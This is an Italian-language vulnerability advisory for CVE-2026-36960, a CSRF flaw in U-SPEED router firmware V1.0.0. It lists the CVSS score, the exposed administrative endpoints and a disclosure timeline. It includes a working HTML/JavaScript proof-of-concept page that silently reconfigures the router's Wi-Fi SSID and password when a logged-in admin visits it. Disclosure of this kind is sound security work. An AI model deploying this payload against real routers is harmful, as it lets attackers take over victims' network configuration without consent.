
Proof-of-concept exploit per CVE-2026-36960, una vulnerabilità CSRF nel firmware del router U-SPEED che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte.
ID CVE: CVE-2026-36960 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: U-SPEED Prodotto: Router U-SPEED Versione Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Il firmware V1.0.0 del router U-SPEED non implementa meccanismi di protezione CSRF come token anti-CSRF o una validazione rigorosa degli header Origin/Referer per gli endpoint API amministrativi. Un attaccante può creare una pagina web dannosa che invia richieste HTTP contraffatte agli endpoint di configurazione. Se un amministratore autenticato visita la pagina web dannosa, il router elabora la richiesta come un'azione amministrativa legittima.
Punteggio CVSS v3.1: 8.8 (Alto)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| Metrica | Valore |
|---|
| Vettore di attacco | Rete |
| Complessità di attacco | Bassa |
| Privilegi richiesti | Nessuno |
| Interazione utente | Richiesta |
| Impatto sulla riservatezza | Alto |
| Impatto sull'integrità | Alto |
| Impatto sulla disponibilità | Alto |
| Endpoint | Funzione |
|---|---|
/api/setWlan | Configurazione della rete wireless |
/api/telnet | Configurazione del servizio Telnet |
| Altri endpoint di configurazione | Varie funzioni amministrative |
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
Comportamento previsto: La richiesta dovrebbe essere rifiutata a causa della mancanza del token CSRF. Comportamento effettivo: Il router accetta ed elabora la richiesta contraffatta.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilità scoperta |
| 2026-04-29 | Segnalata a MITRE |
| 2026-04-29 | CVE-2026-36960 assegnato |
| 2026-04-29 | Divulgazione pubblica |